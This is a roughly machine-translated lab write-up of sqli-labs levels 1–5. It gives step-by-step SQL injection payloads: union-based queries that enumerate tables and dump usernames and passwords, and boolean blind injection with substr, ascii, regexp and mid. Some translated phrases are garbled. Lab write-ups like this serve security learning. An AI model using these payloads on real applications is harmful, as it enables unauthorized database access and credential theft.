Sqli labs range 1-5

technological process

1. Determine injection point and injection type
2. Determine the number of fields
3. Judge the display bit
4. Blast storage
5. Explosion meter
6. Pop field name
7. Pop content

Configuration considerations

Use sqli-labs Local range , Problems needing attention in configuring local range ：

1. Database configuration file db-creds.inc
   

2. php Because the shooting range is very old , therefore php Select a lower version of , such as 5.3.29
   

Less-1 Single quotation mark Injection

1.  Determine injection point and injection type 
 Single quote error  ?id=-1' --+
2.  Check the number of fields 
?id=1' order by 4--+
3.  Judge the display bit 
?id=-1' union select 1,2,3 --+
4.  Check the library 
-1' union select 1,2,database()--+
5.  Look up the table 
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6.  List 
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
7.  Search content 
-1' union select 1,group_concat(username),3 from security.users --+
-1' union select 1,group_concat(username),group_concat(password) from users --+

Judgment type

Single quotation marks echo normally , The query statement is closed , There are injection points

1’ and 1=1 Echo normal ,1’ and 1=2 Echo error

Judgment fields

order by 3 normal ,order by 4 Report errors , There are three fields

Judge the display bit

Blast the name of the warehouse

Reveal the name of the library ：security

Name of Pop Watch

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Name of the table ：emails,referers,uagents,users
Choose a table ,users

Name it

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Pop field

?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

Less-2 Digital injection

Judgment type

and 1=1 normal ,and 1=2 Report errors , The judgment is digital

Judgment fields

order by Determine the number of fields ,3 A field

Judge the display bit

Blast storage

Explosion meter

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Burst train

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Pop field

?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+

Less-3 Single quotation marks + Brackets Inject

Judgment type

Find out ') It can be closed

ps:
During the experiment , It is found that double quotation marks can also be closed , But the execution of subsequent commands failed , It should be that the sentence judgment is not correct .

Check the corresponding sql The sentence can clearly know that this level is ') To close .

Judgment fields

The number of fields is 3

Judge the display bit

Blast storage

Explosion meter

Less-3/?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

Burst train

Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Pop field

Less-4 Double quotes + Brackets Inject

Judgment type

Double quotes + Parentheses can close

Analyze the source code ：

For the input id Added double quotation marks , Parentheses are added to the execution statement

Judgment fields

Judge the display bit

Blast storage

Explosion meter

Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Burst train

Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Pop field

Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from security.users --+

Less-5

Judgment type

Single quote closure

Determine the number of fields

Judge the display bit

No display bit , Try error injection or blind injection

Fifth level reference ：https://blog.csdn.net/Fly_hps/article/details/80247032

Blind note — Based on Boolean

 Test database version ：
/Less-5/?id=1' and left(version(),1)=5 --+
 Check it out. version（）, The version number of the database is 5.3, The meaning of this sentence here is to see if the first digit of the version number is 5, It is clear that the result returned is correct .

Determine the length of the database name

 Test database length 
Less-5/?id=1' and length(database())=8--+

Blasting warehouse name left(a,b)

 The first place of the test library name 
Less-5/?id=1' and left(database(),1)>'a'--+ Less-5/?id=1' and left(database(),1)='s'--+
 Test the first two digits of the library name 
Less-5/?id=1' and left(database(),2)='se'--+
...

Tested greater than 、 Less than after , We can finally use be equal to Make sure that the first place in the database is s
ps：
Without our knowledge , We can use dichotomy to improve injection efficiency

The subsequent judgments are the same , Just guess one by one , It just needs to be modified left（a,b） in b The location of （ This position determines where to start the test ）.
Finally, the name of the database tested is security

Blasting table substr（）、ascii（）

 obtain security The first character of the first table of the database ：
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))>100 --+ /Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=101 --+
 It can be modified by substr(str,start,length) Second parameter in “start” To guess the contents of the second character of the first table .

 Guess the name of the second table , Can pass limit start,length To achieve , By modifying the start Value , To obtain and test the second parameter .
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>100--+

The first table ：

After testing , The first character of the first table of the database is e
The second table ：

After testing , We can determine that the database name is security, And there are... In the database user surface .

Burst train regexp

Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+ Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+

Determine the user Presence in table us**** The column of
Confirm that there are columns username

Pop field ord()、mid()

 obtain user In the table username Of the first character of the first line in ascii:
/Less-5/?id=1' and ord(mid((select IFNULL(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68--+


cast(username as char) take username convert to char type ,
	 Notice that this is cast function (		 grammar ：cast( Field name  as  Type of conversion  )		)
ifnull(expr1,expr2) The syntax of the function is if  expr1  No null,ifnull()  return  expr1, Otherwise it returns  expr2.
0x20 It's a space ascii The hexadecimal representation of the code .
mid() Function to intercept a part of a string ,mid(str,start,length) From the position start Start , Intercept str A string of length position .
ord() The function is the same as ascii(), Convert characters to ascii value 

An error injection
Blind injection is a little painful , Write again when you are free after reporting an error